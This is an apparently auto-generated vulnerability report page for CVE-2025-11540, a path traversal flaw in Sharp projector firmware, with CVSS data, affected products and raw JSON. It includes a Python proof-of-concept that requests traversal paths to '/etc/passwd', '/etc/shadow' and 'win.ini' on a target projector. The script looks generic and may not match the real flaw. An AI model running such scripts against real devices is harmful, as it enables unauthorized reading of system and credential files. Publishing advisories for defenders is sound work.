Security Vulnerability Report
中文
CVE-2025-11540 CVSS 7.5 HIGH

CVE-2025-11540

Published: 2025-12-22 05:16:07
Last Modified: 2026-01-15 20:27:32

Description

Path Traversal vulnerability in Sharp Display Solutions projectors allows a attacker may access and read any files within the projector.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sharp:np-p502h_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502h:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p502w_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502w:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p452h_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p452h:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p452w_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p452w:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p502hg_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502hg:-:*:*:*:*:*:*:* - NOT VULNERABLE
Sharp Display Solutions投影仪(固件版本低于修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-11540 PoC - Path Traversal in Sharp Display Solutions Projectors # Target: Sharp Display Solutions Projector # Vulnerability: Path Traversal allows unauthorized file access # CVSS: 7.5 (High) target_ip = "192.168.1.100" # Replace with target projector IP target_port = 80 def exploit_path_traversal(target_ip, target_port): """ Exploit path traversal vulnerability to read arbitrary files """ # Common paths to test paths = [ "/..\..\..\..\..\..\..\..\..\etc/passwd", "/..\..\..\..\etc/shadow", "/..\..\..\windows/win.ini", "/cgi-bin/..\..\..\..\etc/passwd" ] for path in paths: try: url = f"http://{target_ip}:{target_port}{path}" print(f"[*] Testing: {url}") response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[!] Success! File contents:") print(response.text[:500]) return response.text elif response.status_code == 404: print(f"[-] Path not found, trying next...") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("CVE-2025-11540 PoC - Sharp Projector Path Traversal") print("=" * 50) result = exploit_path_traversal(target_ip, target_port) if result: print("\n[+] Vulnerability confirmed!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11540", "sourceIdentifier": "[email protected]", "published": "2025-12-22T05:16:06.807", "lastModified": "2026-01-15T20:27:31.827", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Path Traversal vulnerability in Sharp Display Solutions projectors allows a attacker may access and read any files within the projector."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502h_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA69E996-0284-4FEE-B15F-E5257A262794"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502h:-:*:*:*:*:*:*:*", "matchCriteriaId": "24783AAF-8F17-4247-88DD-B7BEE1C2DDAF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502w_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "EECEFD65-FFAD-4326-A712-DAB7B9B7756E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502w:-:*:*:*:*:*:*:*", "matchCriteriaId": "E290E2BC-5FD0-43B2-BD46-F0597713AF45"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p452h_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEBFCC3E-DEEB-4D5E-BD7B-E2F0F106AD14"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p452h:-:*:*:*:*:*:*:*", "matchCriteriaId": "20D079AC-E0F6-42D2-A19E-FE7804F28EDB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p452w_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E14B431A-0AA4-4434-8EB7-5E57995C1674"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p452w:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCEAAE7D-950E-4E54-8BED-9AA0607E8223"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502hg_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "539A3D60-4FAF-409D-92EB-19E81FC899FC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502hg:-:*:*:*:*:*:*:*", "matchCriteriaId": "DBE760E8-7D8D-41AC-8B02-5586A9C1810C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502wg_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8810AC6-5B69-45DF-8072-FD897F72BC74"}]}, {" ... (truncated)